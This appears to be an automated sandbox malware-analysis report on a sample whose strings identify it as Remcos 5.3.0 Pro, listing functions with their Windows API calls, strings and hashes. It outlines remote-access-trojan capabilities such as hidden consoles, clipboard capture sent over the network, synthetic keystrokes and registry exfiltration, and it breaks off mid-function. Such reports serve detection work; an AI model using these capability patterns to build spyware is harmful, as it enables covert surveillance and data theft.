MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03

Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?), ref: 00446B31

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
__freea.LIBCMT ref: 00452DAA
__freea.LIBCMT ref: 00452DB6

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68

Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: File$Delete$CloseCopyCreateHandleReadSize
String ID:
API String ID: 1454806937-0
Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70

Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

_memcmp.LIBVCRUNTIME ref: 004446A3
_free.LIBCMT ref: 00444714
_free.LIBCMT ref: 0044472D
_free.LIBCMT ref: 0044475F
_free.LIBCMT ref: 00444768
_free.LIBCMT ref: 00444774

Strings

C, xrefs: 00444561

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
Opcode Fuzzy Hash: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44

Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

udp, xrefs: 00413B01
tcp, xrefs: 00413B2B

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A

Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004017BC

Part of subcall function 004334CF: RtlEnterCriticalSection.NTDLL(00470D18), ref: 004334D9
Part of subcall function 004334CF: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 0043350C

RtlExitUserThread.NTDLL(00000000), ref: 004017F4
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902

Part of subcall function 00433519: RtlEnterCriticalSection.NTDLL(00470D18), ref: 00433524
Part of subcall function 00433519: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 00433561

Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB

Strings

T=G, xrefs: 00401800
>G, xrefs: 0040180B
p[G, xrefs: 00401786
>G, xrefs: 0040188E

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
String ID: T=G$p[G$>G$>G
API String ID: 2307665288-2461731529
Opcode ID: cc904ca02921f622269084490e2ce7f1bf075baca88260d01442eefa1ef5fade
Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
Opcode Fuzzy Hash: cc904ca02921f622269084490e2ce7f1bf075baca88260d01442eefa1ef5fade
Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E

Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18

Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588

Strings

.part, xrefs: 00406C0F

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 98875dd672773ca9856db277106ed48cc003e9625aa19374f5a38d449972a537
Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
Opcode Fuzzy Hash: 98875dd672773ca9856db277106ed48cc003e9625aa19374f5a38d449972a537
Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A

Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE

Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173

_wcslen.LIBCMT ref: 0041A8F6

Strings

.exe, xrefs: 0041A848
program files\, xrefs: 0041A8DC, 0041A8E3, 0041A8F5
:@, xrefs: 0041A8C3
XCG, xrefs: 0041A89C, 0041A8A1
program files (x86)\, xrefs: 0041A8F0
http\shell\open\command, xrefs: 0041A82D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
API String ID: 3286818993-703403762
Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9

Function 0041BEB0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00474358), ref: 0041BEB9
GetConsoleWindow.KERNEL32 ref: 0041BEBF
ShowWindow.USER32(00000000,00000000), ref: 0041BED2
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7

Strings

Remcos v, xrefs: 0041BF12
5.3.0 Pro, xrefs: 0041BF20
CONOUT$, xrefs: 0041BEE5

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Console$Window$AllocOutputShow
String ID: Remcos v$5.3.0 Pro$CONOUT$
API String ID: 4067487056-2527699604
Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D

Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
__alloca_probe_16.LIBCMT ref: 004499E2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
__alloca_probe_16.LIBCMT ref: 00449AC7
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
__freea.LIBCMT ref: 00449B37

Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?), ref: 00446B31

__freea.LIBCMT ref: 00449B40
__freea.LIBCMT ref: 00449B65

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668

Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32 ref: 00418B08
SendInput.USER32(00000001,?,0000001C), ref: 00418B30
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
SendInput.USER32(00000001,?,0000001C), ref: 00418BFF

Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: InputSend$Virtual
String ID:
API String ID: 1167301434-0
Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB

Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00415A46
EmptyClipboard.USER32 ref: 00415A54
CloseClipboard.USER32 ref: 00415A5A
OpenClipboard.USER32 ref: 00415A61
GetClipboardData.USER32(0000000D), ref: 00415A71
GlobalLock.KERNEL32(00000000), ref: 00415A7A
GlobalUnlock.KERNEL32(00000000), ref: 00415A83
CloseClipboard.USER32 ref: 00415A89

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID:
API String ID: 2172192267-0
Opcode ID: ecab05781c1562403568d5212afdd1b293b38462d30a6d73ef557060dbed4de6
Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
Opcode Fuzzy Hash: ecab05781c1562403568d5212afdd1b293b38462d30a6d73ef557060dbed4de6
Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A

Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00447EBC
_free.LIBCMT ref: 00447EE0
_free.LIBCMT ref: 00448067
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
_free.LIBCMT ref: 00448233

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
Opcode Fuzzy Hash: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758

Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F875
_free.LIBCMT ref: 0044F883
_free.LIBCMT ref: 0044F9B1
_free.LIBCMT ref: 0044F9BC

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59

Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
__fassign.LIBCMT ref: 1000954F
__fassign.LIBCMT ref: 1000956A
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
__fassign.LIBCMT ref: 0044A180
__fassign.LIBCMT ref: 0044A19B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A

Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00455AF9

Strings

HE, xrefs: 00455AC0
HE, xrefs: 00455A1D, 00455B0E

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free
String ID: HE$HE
API String ID: 269201875-1978648262
Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA

Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1

Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31

Strings

>G, xrefs: 00412CF0
TUFTUF, xrefs: 00412E2D
DG, xrefs: 00412DFF
DG, xrefs: 00412CF8

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: TUFTUF$>G$DG$DG
API String ID: 3114080316-344394840
Opcode ID: 75bbf877e2b76cc0fc906aba65c1d6d9f45eef616c3beeedef8ce6669c1ccb6a
Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
Opcode Fuzzy Hash: 75bbf877e2b76cc0fc906aba65c1d6d9f45eef616c3beeedef8ce6669c1ccb6a
Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE

Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 1000339B
___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
_ValidateLocalCookies.LIBCMT ref: 10003431
__IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
_ValidateLocalCookies.LIBCMT ref: 100034B1

Strings

csm, xrefs: 10003446

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00437AAB
___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
_ValidateLocalCookies.LIBCMT ref: 00437B41
